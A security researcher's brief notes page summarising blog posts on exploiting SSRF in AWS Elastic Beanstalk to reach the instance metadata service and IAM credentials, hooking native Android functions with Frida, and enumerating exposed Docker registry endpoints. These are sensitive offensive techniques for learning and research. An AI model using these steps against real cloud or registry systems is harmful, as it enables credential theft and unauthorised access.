Notes from Blog Posts

As a security researcher I read a lot of blog posts. Reading once doesn’t mean learning (atleast in my case). So I write down the important points I wish to learn from the blog posts and regularly recall them.

Cloud

Exploiting SSRF in AWS Elastic Beanstalk

  • When you get SSRF in AWS instance, try to visit http://169.254.169.254/latest/user-data. Explore more to get IAM credentials.
  • To verify AWS credentials, use command aws sts get-caller-identity
  • For every ElasticBean AWS creates an S3 bucket to store the source code of the deployment in the following pattern: elasticbeanstalk-<region>-<account-id>

Android

Instrumenting Native Android Functions using Frida

The native libraries (which are stored in .so files within the apk file) are loaded after the main activity loads. So starting the Frida hooker when starting the app might not work.

Docker

Anatomy of a hack: Docker Registry

When you come across a docker registry endpoint, try to browse the following endpoints:

  • docker-registry/v2/_catalog
  • docker-registry/v2/REPO_NAME/tags/list#
  • docker-registry/v2/REPO_NAME/manifests/v2
Feel free to share this article:
error0
Tweet 20
fb-share-icon20